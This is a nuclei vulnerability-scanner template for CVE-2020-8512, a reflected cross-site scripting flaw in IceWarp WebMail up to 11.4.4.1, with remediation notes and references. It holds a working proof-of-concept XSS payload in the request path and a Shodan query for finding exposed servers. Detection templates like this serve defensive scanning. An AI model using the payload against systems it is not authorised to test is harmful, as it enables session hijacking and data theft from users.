nuclei-templates/http/cves/2020/CVE-2020-8512.yaml

55 lines
2.0 KiB
YAML

id: CVE-2020-8512
info:
name: IceWarp WebMail Server <=11.4.4.1 - Cross-Site Scripting
author: pdteam,dwisiswant0
severity: medium
description: IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.
remediation: |
Upgrade to a patched version of IceWarp WebMail Server (>=11.4.4.2) or apply the vendor-provided patch to mitigate the vulnerability.
reference:
- https://www.exploit-db.com/exploits/47988
- https://twitter.com/sagaryadav8742/status/1275170967527006208
- https://cxsecurity.com/issue/WLB-2020010205
- https://packetstormsecurity.com/files/156103/IceWarp-WebMail-11.4.4.1-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-8512
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-8512
cwe-id: CWE-79
epss-score: 0.00692
epss-percentile: 0.79726
cpe: cpe:2.3:a:icewarp:icewarp_server:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: icewarp
product: icewarp_server
shodan-query: title:"icewarp"
tags: cve,cve2020,edb,packetstorm,xss,icewarp
http:
- method: GET
path:
- '{{BaseURL}}/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<svg/onload=alert(document.domain)>"
- "<strong>IceWarp"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a004730450220144c263851998fa91377497074b757f9895d6aeea41149f1d411839b7f4a5d71022100f6ac53a3009610178242836e265a702b8c72cedd972b57d420d924c438483336:922c64590222798bb761d5b6d8e72950